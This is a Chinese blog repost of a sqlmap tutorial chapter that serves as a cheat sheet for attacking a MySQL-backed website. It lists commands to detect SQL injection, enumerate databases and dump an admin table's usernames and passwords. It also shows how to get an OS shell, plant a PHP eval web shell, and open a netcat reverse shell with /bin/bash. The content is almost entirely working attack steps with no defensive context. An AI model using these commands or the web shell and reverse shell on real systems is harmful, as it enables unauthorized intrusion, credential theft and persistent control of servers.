zoukankan      html  css  js  c++  java
  • sqlmap从入门到精通-第五章-5-3 使用sqlmap进行MySQL注入并渗透

    5.3 使用sqlmap进行MySQL注入并渗透

    这一小节没什么东西,作者前面都讲过,这里算是基本都是重复,大家看看,作为一个备忘录吧

    5.3.1 检测SQL注入点

    sqlmap.py -u "http://www.xx.com/index.php?id=3"

    5.3.2 获取当前数据库信息

    sqlmap.py -u "http://www.xx.com/index.php?id=3" --current-db

    5.3.3 获取当前数据库表

    sqlmap.py -u "http://www.xx.com/index.php?id=3" -D bmfx --tables

    5.3.4 获取表列和数据

    sqlmap.py -u "http://www.xx.com/index.php?id=3" -D bmfx -T admin --columns

    sqlmap.py -u "http://www.xx.com/index.php?id=3" -D bmfx -T admin -C id,username,password --dump

    5.3.5 获取webshell

    1. 获取网站信息

    --os-shell

    2. 获取webshell

    echo "<?php @eval($_POST['bmfx']);?>" > bmfx.php

    5.3.6 总结及技巧

    1. 自动提交参数和智能进行注入 sqlmap -u url --batch --smart

    2. 获取所有信息 sqlmap -u url --batch --smart -a

    3. 导出数据库 sqlmap -u url --dump-all

    4. 直接连接数据库 sqlmap -d "mysql://root:root@127.0.0.1:3306/bmfx" -f --banner --dbs --users

    这里如果是root权限可以直接使用--os-shell

    5. 直接获取webshell sqlmap -u url --os-shell

    6. 在Linux反弹shell

    nc -l -p 9988 -e /bin/bash

    nc xxxxx 9988


     
  • 相关阅读:
    OpenGL3:先导篇 数据类型
    Linux开发:同步与异步
    前端面试题
    工具
    API和DLL
    CSS了一个浮动导航条
    AJAX背景技术介绍
    2014年8月18日17:02:53
    怎么增加照片的KB大小
    HTML5增加的几个新的标签
  • 原文地址:https://www.cnblogs.com/autopwn/p/13279692.html
Copyright © 2011-2022 走看看